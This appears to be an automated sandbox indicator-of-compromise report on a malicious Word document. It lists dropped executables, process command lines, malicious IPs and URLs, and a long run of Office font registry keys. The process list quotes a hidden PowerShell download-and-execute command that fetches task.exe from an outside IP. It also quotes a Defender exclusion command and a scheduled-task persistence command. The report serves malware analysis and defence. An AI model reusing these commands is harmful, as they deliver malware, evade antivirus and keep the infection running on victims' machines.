IOC Report

loading gif

Files

File Path
Type
Category
Malicious
MT_1O1_SWIFt.doc
Rich Text Format data, unknown version
initial sample
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\task[1].exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
downloaded
 malicious
C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
data
dropped
 malicious
C:\Users\user\AppData\Local\Temp\tmp3794.tmp
XML 1.0 document, ASCII text
dropped
 malicious
C:\Users\user\AppData\Roaming\SzfukVRF.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Roaming\task.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15885F16.wmf
Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
dropped
 clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B006329.png
370 sysV pure executable
dropped
 clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{CE51F4FB-5B7A-4326-8F7C-4F6978BC9343}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
 clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AEBC8812-958C-44EE-8AED-8858BB920BA5}.tmp
data
dropped
 clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E96B34F0-7523-4243-9DA6-1F3FD956FE04}.tmp
data
dropped
 clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EBB6311B-66D7-463B-B2C9-86511D155F63}.tmp
data
dropped
 clean
C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\MT_1O1_SWIFt.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:55 2021, mtime=Mon Aug 30 20:08:55 2021, atime=Fri Nov 26 01:18:12 2021, length=393131, window=hide
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
ASCII text, with CRLF line terminators
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
Little-endian UTF-16 Unicode text, with no line terminators
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2BTQ2CWP06U44J4VW23J.temp
data
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)
data
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msar (copy)
data
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O2YN4D646O0GDJJK3ZZ8.temp
data
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SWTEXUYGJII0O8O9V6FS.temp
data
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UHZRB3V0JU1J7RFEXRK5.temp
data
dropped
 clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
data
dropped
 clean
C:\Users\user\AppData\Roaming\nfaaxqn4.3to\Chrome\Default\Cookies
SQLite 3.x database, last written using SQLite version 3032001
dropped
 clean
C:\Users\user\AppData\Roaming\nfaaxqn4.3to\Firefox\Profiles\7xwghk55.default\cookies.sqlite
SQLite 3.x database, user version 7, last written using SQLite version 3017000
dropped
 clean
C:\Users\user\Desktop\~$_1O1_SWIFt.doc
data
dropped
 clean
There are 18 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'
malicious
C:\Users\user\AppData\Roaming\task.exe
"C:\Users\user\AppData\Roaming\task.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe
 malicious
C:\Windows\SysWOW64\schtasks.exe
C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmp3794.tmp
 malicious
C:\Users\user\AppData\Roaming\task.exe
C:\Users\user\AppData\Roaming\task.exe
 malicious
C:\Users\user\AppData\Roaming\task.exe
C:\Users\user\AppData\Roaming\task.exe
 malicious
C:\Windows\System32\notepad.exe
C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
 malicious
C:\Windows\System32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
clean
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
httP://173.232.2
unknown
 malicious
httP://173.232.204.89/t
unknown
 malicious
httP://173.232
unknown
 malicious
http://173.232.204.89/task.exe
173.232.204.89
 malicious
httP://173.232.204.89/task.ex
unknown
 malicious
httP://173.232.204.89/task.exe
unknown
 malicious
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
unknown
 clean
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
unknown
 clean
http://173.232.204.89
unknown
 clean
httP://173.232.204.89/task.exePE
unknown
 clean
http://www.piriform.com/ccleaner
unknown
 clean
http://www.%s.comPA
unknown
 clean
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
 clean
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
unknown
 clean
http://servername/isapibackend.dll
unknown
 clean
There are 5 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
us2.smtp.mailhostbox.com
208.91.199.224
 clean

IPs

IP
Domain
Country
Malicious
208.91.198.143
unknown
United States
malicious
208.91.199.225
unknown
United States
malicious
173.232.204.89
unknown
United States
malicious
208.91.199.224
us2.smtp.mailhostbox.com
United States
clean

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
mr*
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
fs*
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
7v*
 clean
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\system32\packager.dll,-2000
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
GraphicsFiltersPNGFilesIntl_1033
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\2E0AE
2E0AE
 clean
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
 clean
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
 clean
